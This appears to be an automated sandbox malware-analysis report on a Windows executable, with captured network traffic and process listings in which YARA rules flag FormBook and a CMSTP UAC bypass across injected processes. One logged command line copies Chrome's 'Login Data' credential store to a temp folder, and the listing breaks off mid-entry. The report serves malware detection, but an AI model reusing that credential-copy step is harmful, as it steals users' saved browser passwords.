                                2024-05-27 06:42:49 UTC1371INData Raw: 3d 6e 28 37 29 3b 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 69 3d 74 26 26 6e 7c 7c 30 3b 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 28 74 3d 22 62 69 6e 61 72 79 22 3d 3d 3d 65 3f 6e 65 77 20 41 72 72 61 79 28 31 36 29 3a 6e 75 6c 6c 2c 65 3d 6e 75 6c 6c 29 3b 76 61 72 20 6f 3d 28 65 3d 65 7c 7c 7b 7d 29 2e 72 61 6e 64 6f 6d 7c 7c 28 65 2e 72 6e 67 7c 7c 61 29 28 29 3b 69 66 28 6f 5b 36 5d 3d 31 35 26 6f 5b 36 5d 7c 36 34 2c 6f 5b 38 5d 3d 36 33 26 6f 5b 38 5d 7c 31 32 38 2c 74 29 66 6f 72 28 76 61 72 20 73 3d 30 3b 73 3c 31 36 3b 2b 2b 73 29 74 5b 69 2b 73 5d 3d 6f 5b 73 5d 3b 72 65 74 75 72 6e 20 74 7c 7c 72 28 6f 29 7d 7d 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20
                                Data Ascii: =n(7);e.exports=function(e,t,n){var i=t&&n||0;"string"==typeof e&&(t="binary"===e?new Array(16):null,e=null);var o=(e=e||{}).random||(e.rng||a)();if(o[6]=15&o[6]|64,o[8]=63&o[8]|128,t)for(var s=0;s<16;++s)t[i+s]=o[s];return t||r(o)}},function(e,t,n){"use
                                2024-05-27 06:42:49 UTC1371INData Raw: 65 62 6b 69 74 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 58 28 22 2b 65 2b 22 70 78 29 22 2c 30 3d 3d 65 26 26 6e 2e 63 79 63 6c 65 73 2d 2d 2c 6e 2e 69 73 46 69 72 73 74 53 6c 69 64 65 3d 21 6e 2e 69 73 46 69 72 73 74 53 6c 69 64 65 3b 66 6f 72 28 76 61 72 20 72 3d 69 2e 67 65 74 43 6f 6e 74 61 69 6e 65 72 28 29 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 73 70 61 6e 22 29 2c 6f 3d 30 3b 6f 3c 72 2e 6c 65 6e 67 74 68 3b 6f 2b 2b 29 22 73 65 6c 65 63 74 65 64 22 3d 3d 3d 72 5b 6f 5d 2e 63 6c 61 73 73 4e 61 6d 65 3f 72 5b 6f 5d 2e 72 65 6d 6f 76 65 41 74 74 72 69 62 75 74 65 28 22 63 6c 61 73 73 22 29 3a 72 5b 6f 5d 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 63 6c 61 73 73 22 2c 22 73 65 6c 65 63 74 65 64 22 29 3b 72 65 74
                                Data Ascii: ebkitTransform="translateX("+e+"px)",0==e&&n.cycles--,n.isFirstSlide=!n.isFirstSlide;for(var r=i.getContainer().querySelectorAll("span"),o=0;o<r.length;o++)"selected"===r[o].className?r[o].removeAttribute("class"):r[o].setAttribute("class","selected");ret


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                12192.168.2.449827142.250.80.744435780C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                TimestampBytes transferredDirectionData
                                2024-05-27 06:42:50 UTC448OUTPOST /chromewebstore/v1.1/items/verify HTTP/1.1
                                Host: www.googleapis.com
                                Connection: keep-alive
                                Content-Length: 119
                                Content-Type: application/json
                                Sec-Fetch-Site: none
                                Sec-Fetch-Mode: no-cors
                                Sec-Fetch-Dest: empty
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                2024-05-27 06:42:50 UTC119OUTData Raw: 7b 22 68 61 73 68 22 3a 22 2b 65 4f 53 46 58 76 36 4f 36 71 37 47 66 4f 75 35 50 2f 56 75 79 39 74 2b 6c 70 33 72 6f 38 6e 6b 58 54 78 42 67 37 44 51 6d 63 3d 22 2c 22 69 64 73 22 3a 5b 22 67 68 62 6d 6e 6e 6a 6f 6f 65 6b 70 6d 6f 65 63 6e 6e 6e 69 6c 6e 6e 62 64 6c 6f 6c 68 6b 68 69 22 5d 2c 22 70 72 6f 74 6f 63 6f 6c 5f 76 65 72 73 69 6f 6e 22 3a 31 7d
                                Data Ascii: {"hash":"+eOSFXv6O6q7GfOu5P/Vuy9t+lp3ro8nkXTxBg7DQmc=","ids":["ghbmnnjooekpmoecnnnilnnbdlolhkhi"],"protocol_version":1}
                                2024-05-27 06:42:50 UTC341INHTTP/1.1 200 OK
                                Content-Type: application/json; charset=UTF-8
                                Vary: Origin
                                Vary: X-Origin
                                Vary: Referer
                                Date: Mon, 27 May 2024 06:42:50 GMT
                                Server: ESF
                                Content-Length: 483
                                X-XSS-Protection: 0
                                X-Frame-Options: SAMEORIGIN
                                X-Content-Type-Options: nosniff
                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                Connection: close
                                2024-05-27 06:42:50 UTC483INData Raw: 7b 0a 20 20 22 70 72 6f 74 6f 63 6f 6c 5f 76 65 72 73 69 6f 6e 22 3a 20 31 2c 0a 20 20 22 73 69 67 6e 61 74 75 72 65 22 3a 20 22 47 71 4d 6d 66 61 62 5a 35 65 4f 51 62 57 58 39 4d 31 55 67 34 43 49 6c 66 49 49 78 4d 2b 67 43 73 4d 74 61 4f 5a 6e 41 66 47 34 6d 77 6e 39 30 6a 4b 6a 35 4e 51 41 65 65 6d 4a 6e 4a 41 44 61 79 66 73 30 67 6d 43 6d 72 37 77 64 4b 62 64 68 45 79 43 5a 69 78 6d 42 78 41 39 4d 6b 56 70 48 6b 54 75 6d 43 5a 46 64 63 34 50 73 46 58 62 69 50 59 32 79 4c 69 32 78 57 41 2f 6b 76 6d 64 32 62 79 6d 2b 75 76 57 4a 64 6c 6c 4d 48 39 42 6f 63 5a 53 63 79 44 4d 48 6d 55 76 52 70 54 65 56 77 6c 54 6c 4d 33 45 52 32 6a 42 72 4d 61 69 4e 69 52 54 6a 45 36 33 50 6d 4b 6b 72 66 57 56 50 2f 51 50 42 64 59 54 49 4e 39 71 35 57 67 50 52 38 69 34 39
                                Data Ascii: { "protocol_version": 1, "signature": "GqMmfabZ5eOQbWX9M1Ug4CIlfIIxM+gCsMtaOZnAfG4mwn90jKj5NQAeemJnJADayfs0gmCmr7wdKbdhEyCZixmBxA9MkVpHkTumCZFdc4PsFXbiPY2yLi2xWA/kvmd2bym+uvWJdllMH9BocZScyDMHmUvRpTeVwlTlM3ER2jBrMaiNiRTjE63PmKkrfWVP/QPBdYTIN9q5WgPR8i49


                                Statistics

                                CPU Usage

                                Click to jump to process

                                Memory Usage

                                Click to jump to process

                                High Level Behavior Distribution

                                Click to dive into process behavior distribution

                                Behavior

                                Click to jump to process

                                System Behavior

                                General

                                Target ID:0
                                Start time:02:42:01
                                Start date:27/05/2024
                                Path:C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exe"
                                Imagebase:0x21cce100000
                                File size:575'728 bytes
                                MD5 hash:84144B6048277290BB6EB647BBC5AD2A
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1904365892.0000021CCFFF4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.1906133921.0000021CDFF61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1906133921.0000021CDFF61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.1906133921.0000021CDFF61000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.1906133921.0000021CDFF61000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.1906133921.0000021CDFF61000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                Reputation:low
                                Has exited:true

                                General

                                Target ID:1
                                Start time:02:42:06
                                Start date:27/05/2024
                                Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Program Files (x86)\Internet Explorer\iexplore.exe"
                                Imagebase:0xb80000
                                File size:828'368 bytes
                                MD5 hash:6F0F06D6AB125A99E43335427066A4A1
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.1818201037.0000000003580000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1818201037.0000000003580000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1818201037.0000000003580000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.1818201037.0000000003580000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.1818201037.0000000003580000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.1818164423.0000000003550000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1818164423.0000000003550000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1818164423.0000000003550000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.1818164423.0000000003550000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.1818164423.0000000003550000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.1817657781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1817657781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1817657781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.1817657781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.1817657781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                Reputation:moderate
                                Has exited:true

                                General

                                Target ID:4
                                Start time:02:42:06
                                Start date:27/05/2024
                                Path:C:\Windows\System32\WerFault.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\WerFault.exe -u -p 7532 -s 1080
                                Imagebase:0x7ff6d5ea0000
                                File size:570'736 bytes
                                MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:5
                                Start time:02:42:07
                                Start date:27/05/2024
                                Path:C:\Windows\explorer.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\Explorer.EXE
                                Imagebase:0x7ff72b770000
                                File size:5'141'208 bytes
                                MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:false

                                General

                                Target ID:6
                                Start time:02:42:10
                                Start date:27/05/2024
                                Path:C:\Windows\SysWOW64\mstsc.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\SysWOW64\mstsc.exe"
                                Imagebase:0x300000
                                File size:1'264'640 bytes
                                MD5 hash:EA4A02BE14C405327EEBA8D9AD2BD42C
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.4160236681.0000000004EF0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4160236681.0000000004EF0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4160236681.0000000004EF0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.4160236681.0000000004EF0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.4160236681.0000000004EF0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.4160052879.0000000004EC0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4160052879.0000000004EC0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4160052879.0000000004EC0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.4160052879.0000000004EC0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.4160052879.0000000004EC0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.4157361855.0000000002F90000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4157361855.0000000002F90000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4157361855.0000000002F90000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.4157361855.0000000002F90000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.4157361855.0000000002F90000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                Reputation:moderate
                                Has exited:false

                                General

                                Target ID:8
                                Start time:02:42:20
                                Start date:27/05/2024
                                Path:C:\Windows\SysWOW64\cmd.exe
                                Wow64 process (32bit):true
                                Commandline:/c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
                                Imagebase:0x240000
                                File size:236'544 bytes
                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:9
                                Start time:02:42:20
                                Start date:27/05/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff7699e0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:12
                                Start time:02:42:28
                                Start date:27/05/2024
                                Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Program Files (x86)\Internet Explorer\iexplore.exe"
                                Imagebase:0xb80000
                                File size:828'368 bytes
                                MD5 hash:6F0F06D6AB125A99E43335427066A4A1
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:moderate
                                Has exited:true

                                General

                                Target ID:13
                                Start time:02:42:28
                                Start date:27/05/2024
                                Path:C:\Program Files\Internet Explorer\iexplore.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Program Files\Internet Explorer\IEXPLORE.EXE"
                                Imagebase:0x7ff7aea80000
                                File size:834'512 bytes
                                MD5 hash:CFE2E6942AC1B72981B3105E22D3224E
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:moderate
                                Has exited:false

                                General

                                Target ID:14
                                Start time:02:42:28
                                Start date:27/05/2024
                                Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3916 CREDAT:9474 /prefetch:2
                                Imagebase:0xb80000
                                File size:828'368 bytes
                                MD5 hash:6F0F06D6AB125A99E43335427066A4A1
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.4231398925.000000000E520000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.4231398925.000000000E520000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.4231398925.000000000E520000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.4231398925.000000000E520000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.4231398925.000000000E520000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                Reputation:moderate
                                Has exited:false

                                General

                                Target ID:15
                                Start time:02:42:31
                                Start date:27/05/2024
                                Path:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe" --from-ie-to-edge=3 --ie-frame-hwnd=204a6
                                Imagebase:0x7ff6faf30000
                                File size:540'712 bytes
                                MD5 hash:89CF8972D683795DAB6901BC9456675D
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:moderate
                                Has exited:true

                                General

                                Target ID:16
                                Start time:02:42:31
                                Start date:27/05/2024
                                Path:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe" --from-ie-to-edge=3 --ie-frame-hwnd=204a6
                                Imagebase:0x7ff6faf30000
                                File size:540'712 bytes
                                MD5 hash:89CF8972D683795DAB6901BC9456675D
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:moderate
                                Has exited:true

                                General

                                Target ID:17
                                Start time:02:42:31
                                Start date:27/05/2024
                                Path:C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\PROGRA~2\Java\jre-1.8\bin\ssvagent.exe" -new
                                Imagebase:0x4b0000
                                File size:85'632 bytes
                                MD5 hash:F9A898A606E7F5A1CD7CFFA8079253A0
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:moderate
                                Has exited:true

                                General

                                Target ID:18
                                Start time:02:42:31
                                Start date:27/05/2024
                                Path:C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\PROGRA~2\Java\jre-1.8\bin\ssvagent.exe" -new
                                Imagebase:0x4b0000
                                File size:85'632 bytes
                                MD5 hash:F9A898A606E7F5A1CD7CFFA8079253A0
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Has exited:true

                                General

                                Target ID:19
                                Start time:02:42:31
                                Start date:27/05/2024
                                Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --from-ie-to-edge=3 --ie-frame-hwnd=204a6
                                Imagebase:0x7ff67dcd0000
                                File size:4'210'216 bytes
                                MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Has exited:false

                                General

                                Target ID:20
                                Start time:02:42:31
                                Start date:27/05/2024
                                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                Imagebase:0x7ff6bf500000
                                File size:676'768 bytes
                                MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Has exited:true

                                General

                                Target ID:22
                                Start time:02:42:31
                                Start date:27/05/2024
                                Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=2028,i,9608727623901059389,15898401197256129571,262144 /prefetch:3
                                Imagebase:0x7ff67dcd0000
                                File size:4'210'216 bytes
                                MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Has exited:false

                                General

                                Target ID:23
                                Start time:02:42:36
                                Start date:27/05/2024
                                Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=5640 --field-trial-handle=2028,i,9608727623901059389,15898401197256129571,262144 /prefetch:8
                                Imagebase:0x7ff67dcd0000
                                File size:4'210'216 bytes
                                MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Has exited:true

                                General

                                Target ID:27
                                Start time:02:42:40
                                Start date:27/05/2024
                                Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Program Files (x86)\Internet Explorer\iexplore.exe"
                                Imagebase:0xb80000
                                File size:828'368 bytes
                                MD5 hash:6F0F06D6AB125A99E43335427066A4A1
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Has exited:true

                                General

                                Target ID:28
                                Start time:02:42:41
                                Start date:27/05/2024
                                Path:C:\Program Files\Internet Explorer\iexplore.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Program Files\Internet Explorer\IEXPLORE.EXE"
                                Imagebase:0x7ff7aea80000
                                File size:834'512 bytes
                                MD5 hash:CFE2E6942AC1B72981B3105E22D3224E
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Has exited:true

                                General

                                Target ID:29
                                Start time:02:42:41
                                Start date:27/05/2024
                                Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3916 CREDAT:9478 /prefetch:2
                                Imagebase:0xb80000
                                File size:828'368 bytes
                                MD5 hash:6F0F06D6AB125A99E43335427066A4A1
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001D.00000002.4248139432.000000000F1B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000001D.00000002.4248139432.000000000F1B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001D.00000002.4248139432.000000000F1B0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001D.00000002.4248139432.000000000F1B0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001D.00000002.4248139432.000000000F1B0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                Has exited:false

                                General

                                Target ID:30
                                Start time:02:42:42
                                Start date:27/05/2024
                                Path:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6476 --field-trial-handle=2028,i,9608727623901059389,15898401197256129571,262144 /prefetch:8
                                Imagebase:0x7ff7d2330000
                                File size:1'255'976 bytes
                                MD5 hash:76C58E5BABFE4ACF0308AA646FC0F416
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Has exited:true

                                General

                                Target ID:31
                                Start time:02:42:42
                                Start date:27/05/2024
                                Path:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6476 --field-trial-handle=2028,i,9608727623901059389,15898401197256129571,262144 /prefetch:8
                                Imagebase:0x7ff7d2330000
                                File size:1'255'976 bytes
                                MD5 hash:76C58E5BABFE4ACF0308AA646FC0F416
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Has exited:true

                                General

                                Target ID:32
                                Start time:02:42:45
                                Start date:27/05/2024
                                Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3916 CREDAT:3675436 /prefetch:2
                                Imagebase:0xb80000
                                File size:828'368 bytes
                                MD5 hash:6F0F06D6AB125A99E43335427066A4A1
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Has exited:true

                                General

                                Target ID:33
                                Start time:02:42:54
                                Start date:27/05/2024
                                Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
                                Imagebase:0x7ff67dcd0000
                                File size:4'210'216 bytes
                                MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Has exited:true

                                General

                                Target ID:34
                                Start time:02:42:55
                                Start date:27/05/2024
                                Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                Wow64 process (32bit):false
